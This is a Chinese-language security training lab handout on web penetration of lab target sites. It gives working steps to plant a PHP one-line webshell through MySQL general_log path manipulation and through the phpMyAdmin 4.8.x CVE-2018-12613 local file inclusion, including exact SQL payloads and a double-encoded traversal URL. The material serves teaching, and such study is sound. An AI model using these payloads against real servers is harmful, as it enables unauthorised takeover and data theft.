实训5 靶站点渗透实践

实训目的

了解拒绝服务攻击Dos和分布式拒绝服务攻击DDos原理。

了解Web入侵的一般步骤。

能进行拒绝服务攻击的流量分析。

能进行Web入侵的溯源分析。

实训准备及注意事项

1．硬件：windows攻击机一台、windows、linux服务器各一台。

2．软件：后台扫描工具、phpstudy、靶站两个。   

3．严格按照实验步骤进行实验，实验结果以截图的形式进行保留。

实训背景知识

Web渗透

也称为Web应用安全渗透测试，是一种通过模拟黑客攻击来评估Web应用程序安全性的过程。其目的是发现应用程序中的潜在漏洞，以便及时修复，防止黑客利用这些漏洞进行恶意攻击。Web渗透测试可以帮助组织了解自身安全状况，提升安全防护能力。

Web渗透测试的过程通常包括以下几个步骤：

1.信息收集：收集目标Web应用程序的相关信息，如域名、IP地址、服务器类型、开放端口、Web框架等。

2.漏洞扫描：利用自动化工具对目标进行漏洞扫描，发现可能存在的安全漏洞。

3.漏洞验证：对扫描发现的漏洞进行手工验证，确认漏洞的真实性和可利用性。

4.权限提升：利用已发现的漏洞，尝试获取更高的权限，如管理员权限等。

5.数据窃取：尝试窃取敏感数据，如用户密码、数据库信息等。

6.编写报告：将渗透测试的过程、发现的漏洞、利用漏洞的方式以及修复建议等编写成报告，提交给相关部门。

需要注意的是，Web渗透测试必须遵循法律和道德规范，不得未经授权擅自对他人系统进行渗透测试。同时，渗透测试人员应具备专业的技能和知识，以确保测试的准确性和有效性。为了保障Web应用程序的安全性，除了进行渗透测试外，还应采取其他安全措施，如定期更新补丁、使用强密码、限制访问权限等。此外，加强员工的安全意识培训也是非常重要的，可以提高员工对潜在安全威胁的识别和防范能力。

phpMyAdmin

phpMyAdmin 是一个以PHP为基础，以Web-Base方式架构在网站主机上的MySQL的数据库管理工具，让管理者可用Web接口管理MySQL数据库。借由此Web接口可以成为一个简易方式输入繁杂SQL语法的较佳途径，尤其要处理大量资料的汇入及汇出更为方便。其中一个更大的优势在于由于phpMyAdmin跟其他PHP程序一样在网页服务器上执行，但是您可以在任何地方使用这些程序产生的HTML页面，也就是于远端管理MySQL数据库，方便的建立、修改、删除数据库及资料表。也可借由phpMyAdmin建立常用的php语法，方便编写网页时所需要的sql语法正确性。

文件包含漏洞（File Inclusion Vulnerability）

该漏洞是Web应用程序中常见的一种安全漏洞。这种漏洞通常发生在动态网页中，攻击者通过在URL中注入恶意代码，使应用程序将恶意代码作为正常代码执行。具体来说，开发人员为了方便起见，会将经常使用的函数或代码封装在一个单独的文件中，并在需要时直接调用该文件。为了提高代码的灵活性，开发人员通常会将被包含的文件设置为变量并进行动态调用。然而，这种设计也带来了安全隐患，因为攻击者可能会利用这一特性来调用恶意的文件，进而执行任意代码。

文件包含漏洞的危害性很大，攻击者可以利用该漏洞窃取敏感信息、篡改数据、控制服务器等。利用文件包含漏洞的方法有多种，例如利用包含漏洞将用户上传的恶意代码由包含函数加载并执行，或者向Web日志中插入恶意代码并通过文件包含漏洞执行。

为了防御文件包含漏洞，可以采取一些措施，如对用户提交的文件路径进行有效的验证和过滤，以防止恶意文件路径被提交；配置文件系统权限以防止未经授权的用户访问敏感文件或目录；使用安全的编程实践和框架来减少漏洞的可能性等。

实训任务1 Web站点渗透一

1. 平台内分别启动靶机（启动即可无需其他操作）和攻击机（左下角课程工具中），后续操作全部在攻击机中完成。
2. 在攻击机中根据靶机IP地址使用chrome浏览器打开并浏览靶机中架设的网站。
3. 合理选择攻击机中的工具对目标Web进行扫描，收集信息，了解web服务器类型，查看是否有可疑端口、地址或文件。
4. 根据可疑端口、地址或文件，设法找到网站数据库连接的地址和root密码。
5. 以root权限登录网站数据库后，尝试利用日志文件来进行 getshell。首先在 sql 处执行“SHOW VARIABLES LIKE 'general%'”查看是否开启日志功能以及日志文件的保存路径。

1. 如日志功能暂未开启。可以执行“set global general_log = "ON";”开启 mysql 日志功能，再次确认日志功能是否开启。
2. 之后执行 sql 语句“select ‘<?php @eval($_POST[1]);?>’”，向日志文件中写入 php 一句话木马。
3. 但由于在linux中mysql数据库的日志与web目录的用户权限是分开的，我们此时还无法通过目录地址访问该日志文件。
4. 修改日志文件存储路径和文件名的语句为“set global general_log_file=' 绝对路径';”。
5. 寻找网站在服务器上的绝对地址（浏览可能包含该信息的文件）。
6. 执行：“set global general_log_file=' C://xxx//xxx//xxx//shell.php';”将日志文件的存储路径改为站点根目录下的 shell.php 文件。
7. 重新写入php一句话木马。
8. 之后在浏览器中访问shell.php，查看是否能够访问成功。
9. 使用webshell管理工具连接创建的shell.php文件，控制服务器。

截取对网站扫描的结果

截取成功登入数据库后台界面

截取mysql日志功能成功开启的界面

截取网站在服务器中的绝对地址信息

实训任务2 Web站点渗透二

1. 平台内分别启动靶机（启动即可无需其他操作）和攻击机（左下角课程工具中），后续操作全部在攻击机中完成。
2. 在攻击机中根据靶机IP地址使用chrome浏览器打开并浏览靶机中架设的网站。
3. 合理选择攻击机中的工具对目标Web进行扫描，收集信息，了解web服务器类型，查看是否有可疑端口、地址或文件。
4. 根据可疑端口、地址或文件，设法找到网站数据库连接的地址和密码。
5. 登录网站数据库后，查看数据库管理系统的版本号，并在互联网中搜索是否有可以利用的安全漏洞。

参考内容：phpMyAdmin 4.8.x 本地文件包含漏洞利用 | Vulnspy Blog

1. 利用 CVE-2018-12613 进行 getshell。在 SQL 语句执行处执行SELECT “ <?php file_put_contents('shell.php','<?php @eval($_POST[1]);?>');?>” ，这句话的含义为向 shell.php 文件中写入一句话木马（但还没有真正成功创建）。

1. 打开浏览器的开发者工具（F12）获取sessionID（phpmyadmin的session会保存近期执行过的sql语句）。

1. 根据漏洞利用原理：PHP会自动urldecode一次加百分号的参数，提交%253f（?的urlencode的urlencode）的时候自动转成%3f，满足该版本软件的白名单条件不会被后台过滤掉，此时%253f/就会被认为是一个目录，从而include。即? -> %3f -> %253f。

以此构造url如下：

http://xxx.xx.xx.xxx:xxx/phpmyadmin/index.php?target=db_sql.php%253f/../../../../../../../../var/lib/php/sessions/sess_此处为步骤7获取到的sessionID

1. 使用webshell管理工具连接创建的shell.php文件，控制服务器。

截取在浏览器中成功访问shell.php的界面

截取webshell工具成功控制服务器的界面

实验总结

什么是文件包含漏洞？

文件包含漏洞就是使用函数去包含任意文件的时候，当包含的文件来源过滤不严谨的时候，当存在包含恶意文件后，就可以通过这个恶意的文件来达到相应的目的。